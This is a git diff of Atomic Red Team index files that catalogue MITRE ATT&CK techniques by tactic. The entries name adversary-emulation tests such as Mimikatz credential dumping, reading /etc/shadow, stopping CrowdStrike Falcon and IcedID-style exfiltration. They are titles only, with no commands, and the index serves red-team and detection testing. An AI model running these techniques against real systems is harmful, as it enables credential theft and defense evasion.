+- T1587.004 Exploits [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1588.005 Exploits [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1587.001 Malware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1588.001 Malware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1588 Obtain Capabilities [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1583.004 Server [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1584.004 Server [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1585.001 Social Media Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1586.001 Social Media Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1588.002 Tool [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1583.003 Virtual Private Server [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1584.003 Virtual Private Server [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1588.006 Vulnerabilities [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1583.006 Web Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1584.006 Web Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+
+# reconnaissance
+- T1595 Active Scanning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1591.002 Business Relationships [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1596.004 CDNs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1592.004 Client Configurations [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1589.001 Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1590.002 DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1596.001 DNS/Passive DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1591.001 Determine Physical Locations [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1596.003 Digital Certificates [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1590.001 Domain Properties [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1589.002 Email Addresses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1589.003 Employee Names [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1592.003 Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1592 Gather Victim Host Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1589 Gather Victim Identity Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1590 Gather Victim Network Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1591 Gather Victim Org Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1592.001 Hardware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1590.005 IP Addresses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1591.003 Identify Business Tempo [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1591.004 Identify Roles [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1590.006 Network Security Appliances [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1590.004 Network Topology [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1590.003 Network Trust Dependencies [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1598 Phishing for Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1597.002 Purchase Technical Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1596.005 Scan Databases [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1595.001 Scanning IP Blocks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1597 Search Closed Sources [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1593.002 Search Engines [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1596 Search Open Technical Databases [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1593 Search Open Websites/Domains [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1594 Search Victim-Owned Websites [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1593.001 Social Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1592.002 Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1598.002 Spearphishing Attachment [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1598.003 Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1598.001 Spearphishing Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1597.001 Threat Intel Vendors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1595.002 Vulnerability Scanning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1596.002 WHOIS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+
# execution
- [T1059.002 AppleScript](../../T1059.002/T1059.002.md)
- Atomic Test #1: AppleScript [macos]
@@ -1094,6 +1272,7 @@
- T1204.001 Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1106 Native API](../../T1106/T1106.md)
- Atomic Test #1: Execution through API - CreateProcess [windows]
+- T1059.008 Network Device CLI [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1059.001 PowerShell](../../T1059.001/T1059.001.md)
- Atomic Test #1: Mimikatz [windows]
- Atomic Test #2: Run BloodHound from local disk [windows]
@@ -1119,6 +1298,7 @@
- Atomic Test #2: Scheduled task Local [windows]
- Atomic Test #3: Scheduled task Remote [windows]
- Atomic Test #4: Powershell Cmdlet Scheduled Task [windows]
+ - Atomic Test #5: Task Scheduler via VBA [windows]
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1064 Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1569.002 Service Execution](../../T1569.002/T1569.002.md)
@@ -1128,6 +1308,7 @@
- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1153 Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1569 System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1053.006 Systemd Timers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1059.004 Unix Shell](../../T1059.004/T1059.004.md)
- Atomic Test #1: Create and Execute Bash Shell Script [macos, linux]
- Atomic Test #2: Command-Line Interface [macos, linux]
@@ -1135,6 +1316,7 @@
- [T1059.005 Visual Basic](../../T1059.005/T1059.005.md)
- Atomic Test #1: Visual Basic script execution to gather local computer information [windows]
- Atomic Test #2: Encoded VBS code execution [windows]
+ - Atomic Test #3: Extract Memory via VBA [windows]
- [T1059.003 Windows Command Shell](../../T1059.003/T1059.003.md)
- Atomic Test #1: Create and Execute Batch Script [windows]
- [T1047 Windows Management Instrumentation](../../T1047/T1047.md)
@@ -1259,69 +1441,6 @@
- Atomic Test #3: Malicious User Agents - Nix [linux, macos]
- T1102 Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-# collection
-- [T1560 Archive Collected Data](../../T1560/T1560.md)
- - Atomic Test #1: Compress Data for Exfiltration With PowerShell [windows]
-- T1560.003 Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1560.002 Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1560.001 Archive via Utility](../../T1560.001/T1560.001.md)
- - Atomic Test #1: Compress Data for Exfiltration With Rar [windows]
- - Atomic Test #2: Compress Data and lock with password for Exfiltration with winrar [windows]
- - Atomic Test #3: Compress Data and lock with password for Exfiltration with winzip [windows]
- - Atomic Test #4: Compress Data and lock with password for Exfiltration with 7zip [windows]
- - Atomic Test #5: Data Compressed - nix - zip [linux, macos]
- - Atomic Test #6: Data Compressed - nix - gzip Single File [linux, macos]
- - Atomic Test #7: Data Compressed - nix - tar Folder or File [linux, macos]
- - Atomic Test #8: Data Encrypted with zip and gpg symmetric [macos, linux]
-- [T1123 Audio Capture](../../T1123/T1123.md)
- - Atomic Test #1: using device audio capture commandlet [windows]
-- [T1119 Automated Collection](../../T1119/T1119.md)
- - Atomic Test #1: Automated Collection Command Prompt [windows]
- - Atomic Test #2: Automated Collection PowerShell [windows]
- - Atomic Test #3: Recon information for export with PowerShell [windows]
- - Atomic Test #4: Recon information for export with Command Prompt [windows]
-- [T1115 Clipboard Data](../../T1115/T1115.md)
- - Atomic Test #1: Utilize Clipboard to store or execute commands from [windows]
- - Atomic Test #2: Execute Commands from Clipboard using PowerShell [windows]
- - Atomic Test #3: Execute commands from clipboard [macos]
-- T1213.001 Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1056.004 Credential API Hooking](../../T1056.004/T1056.004.md)
- - Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows]
-- T1074 Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1530 Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1005 Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1039 Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1025 Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1114 Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1114.003 Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1056.002 GUI Input Capture](../../T1056.002/T1056.002.md)
- - Atomic Test #1: AppleScript - Prompt User for Password [macos]
- - Atomic Test #2: PowerShell - Prompt User for Password [windows]
-- T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1056.001 Keylogging](../../T1056.001/T1056.001.md)
- - Atomic Test #1: Input Capture [windows]
-- T1557.001 LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1074.001 Local Data Staging](../../T1074.001/T1074.001.md)
- - Atomic Test #1: Stage data from Discovery.bat [windows]
- - Atomic Test #2: Stage data from Discovery.sh [linux, macos]
- - Atomic Test #3: Zip a Folder with PowerShell for Staging in Temp [windows]
-- [T1114.001 Local Email Collection](../../T1114.001/T1114.001.md)
- - Atomic Test #1: Email Collection with PowerShell Get-Inbox [windows]
-- T1185 Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1074.002 Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1114.002 Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1113 Screen Capture](../../T1113/T1113.md)
- - Atomic Test #1: Screencapture [macos]
- - Atomic Test #2: Screencapture (silent) [macos]
- - Atomic Test #3: X Windows Capture [linux]
- - Atomic Test #4: Capture Linux Desktop using Import Tool [linux]
- - Atomic Test #5: Windows Screencapture [windows]
-- T1213.002 Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1125 Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-
# exfiltration
- [T1020 Automated Exfiltration](../../T1020/T1020.md)
- Atomic Test #1: IcedID Botnet HTTP PUT [windows]
@@ -1345,6 +1464,7 @@
- T1567.002 Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1567.001 Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1029 Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1020.001 Traffic Duplication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1537 Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# initial-access
diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md
index 282b47c5..090af769 100644
--- a/atomics/Indexes/Indexes-Markdown/linux-index.md
+++ b/atomics/Indexes/Indexes-Markdown/linux-index.md
@@ -7,6 +7,7 @@
- [T1053.001 At (Linux)](../../T1053.001/T1053.001.md)
- Atomic Test #1: At - Schedule a job [linux]
- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1053.003 Cron](../../T1053.003/T1053.003.md)
@@ -38,6 +39,7 @@
- Atomic Test #3: Disable tty_tickets for sudo caching [macos, linux]
- [T1543.002 Systemd Service](../../T1543.002/T1543.002.md)
- Atomic Test #1: Create Systemd Service [linux]
+- T1053.006 Systemd Timers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.005 Trap](../../T1546.005/T1546.005.md)
- Atomic Test #1: Trap [macos, linux]
- T1055.014 VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -50,10 +52,11 @@
- T1098 Account Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1098.003 Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1137.006 Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1098.001 Additional Azure Service Principal Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1098.001 Additional Cloud Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1053.001 At (Linux)](../../T1053.001/T1053.001.md)
- Atomic Test #1: At - Schedule a job [linux]
- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1542.003 Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1176 Browser Extensions](../../T1176/T1176.md)
- Atomic Test #1: Chrome (Developer Mode) [linux, windows, macos]
@@ -93,6 +96,7 @@
- T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1542.004 ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1098.004 SSH Authorized Keys](../../T1098.004/T1098.004.md)
@@ -101,6 +105,8 @@
- T1505 Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1543.002 Systemd Service](../../T1543.002/T1543.002.md)
- Atomic Test #1: Create Systemd Service [linux]
+- T1053.006 Systemd Timers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1542.005 TFTP Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1505.002 Transport Agent [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.005 Trap](../../T1546.005/T1546.005.md)
@@ -112,6 +118,7 @@
- [T1003.008 /etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md)
- Atomic Test #1: Access /etc/shadow (Local) [linux]
- Atomic Test #2: Access /etc/passwd (Local) [linux]
+- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1552.003 Bash History](../../T1552.003/T1552.003.md)
- Atomic Test #1: Search Through Bash History [linux, macos]
- T1110 Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -126,6 +133,7 @@
- T1056.001 Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1556.004 Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1040 Network Sniffing](../../T1040/T1040.md)
- Atomic Test #1: Packet Capture Linux [linux]
- T1003 OS Credential Dumping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -145,6 +153,44 @@
- T1552 Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+# collection
+- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1560 Archive Collected Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1560.003 Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1560.002 Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1560.001 Archive via Utility](../../T1560.001/T1560.001.md)
+ - Atomic Test #5: Data Compressed - nix - zip [linux, macos]
+ - Atomic Test #6: Data Compressed - nix - gzip Single File [linux, macos]
+ - Atomic Test #7: Data Compressed - nix - tar Folder or File [linux, macos]
+ - Atomic Test #8: Data Encrypted with zip and gpg symmetric [macos, linux]
+- T1123 Audio Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1119 Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1115 Clipboard Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1213.001 Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1074 Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1530 Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1602 Data from Configuration Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1005 Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1039 Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1025 Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1114 Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1114.003 Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1056.001 Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1074.001 Local Data Staging](../../T1074.001/T1074.001.md)
+ - Atomic Test #2: Stage data from Discovery.sh [linux, macos]
+- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1602.002 Network Device Configuration Dump [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1074.002 Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1114.002 Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1602.001 SNMP (MIB Dump) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1113 Screen Capture](../../T1113/T1113.md)
+ - Atomic Test #3: X Windows Capture [linux]
+ - Atomic Test #4: Capture Linux Desktop using Import Tool [linux]
+- T1213.002 Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+
# defense-evasion
- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -171,6 +217,8 @@
- T1078.001 Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1578.003 Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1140 Deobfuscate/Decode Files or Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1562.008 Disable Cloud Logs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1600.002 Disable Crypto Hardware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1562.007 Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1562.004 Disable or Modify System Firewall](../../T1562.004/T1562.004.md)
- Atomic Test #1: Disable iptables firewall [linux]
@@ -180,6 +228,7 @@
- Atomic Test #3: Disable SELinux [linux]
- Atomic Test #4: Stop Crowdstrike Falcon on Linux [linux]
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1601.002 Downgrade System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1480.001 Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -189,14 +238,14 @@
- Atomic Test #3: Overwrite and delete a file with shred [linux]
- Atomic Test #8: Delete Filesystem - Linux [linux]
- T1222 File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1562.003 HISTCONTROL](../../T1562.003/T1562.003.md)
- - Atomic Test #1: Disable history collection [linux, macos]
- - Atomic Test #2: Mac HISTCONTROL [macos, linux]
- T1564.005 Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1564.001 Hidden Files and Directories](../../T1564.001/T1564.001.md)
- Atomic Test #1: Create a hidden file in a hidden directory [linux, macos]
- T1564 Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1562.003 Impair Command History Logging](../../T1562.003/T1562.003.md)
+ - Atomic Test #1: Disable history collection [linux, macos]
+ - Atomic Test #2: Mac HISTCONTROL [macos, linux]
- T1562 Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1562.006 Indicator Blocking](../../T1562.006/T1562.006.md)
- Atomic Test #1: Auditing Configuration Changes on Linux Host [linux]
@@ -225,14 +274,21 @@
- T1036.005 Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1578 Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1601 Modify System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1599.001 Network Address Translation Traversal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1599 Network Boundary Bridging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1556.004 Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1027 Obfuscated Files or Information](../../T1027/T1027.md)
- Atomic Test #1: Decode base64 Data into Script [macos, linux]
+- T1601.001 Patch System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1556.003 Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.009 Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055 Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1542.004 ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1600.001 Reduce Key Space [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1036.003 Rename System Utilities](../../T1036.003/T1036.003.md)
- Atomic Test #2: Masquerading as Linux crond process. [linux]
@@ -256,6 +312,7 @@
- Atomic Test #3: Disable tty_tickets for sudo caching [macos, linux]
- [T1497.001 System Checks](../../T1497.001/T1497.001.md)
- Atomic Test #1: Detect Virtualization Environment (Linux) [linux]
+- T1542.005 TFTP Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1070.006 Timestomp](../../T1070.006/T1070.006.md)
- Atomic Test #1: Set a file's access timestamp [linux, macos]
@@ -266,9 +323,11 @@
- T1535 Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1564.007 VBA Stomping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.014 VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1600 Weaken Encryption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1550.004 Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# impact
@@ -296,6 +355,7 @@
- Atomic Test #1: macOS/Linux - Simulate CPU Load with Yes [macos, linux]
- T1565.003 Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1499.002 Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1489 Service Stop [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1565.001 Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1529 System Shutdown/Reboot](../../T1529/T1529.md)
- Atomic Test #3: Restart System via `shutdown` - macOS/Linux [macos, linux]
@@ -313,6 +373,7 @@
- Atomic Test #1: List Mozilla Firefox Bookmark Database Files on Linux [linux]
- T1087.004 Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1069.003 Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1580 Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1538 Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1526 Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1087.002 Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -368,6 +429,83 @@
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+# resource-development
+- T1583 Acquire Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1583.005 Botnet [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1584.005 Botnet [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1587.002 Code Signing Certificates [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1588.003 Code Signing Certificates [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1586 Compromise Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1584 Compromise Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1583.002 DNS Server [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1584.002 DNS Server [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1587 Develop Capabilities [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1587.003 Digital Certificates [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1588.004 Digital Certificates [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1583.001 Domains [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1584.001 Domains [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1585.002 Email Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1586.002 Email Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1585 Establish Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1587.004 Exploits [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1588.005 Exploits [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1587.001 Malware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1588.001 Malware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1588 Obtain Capabilities [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
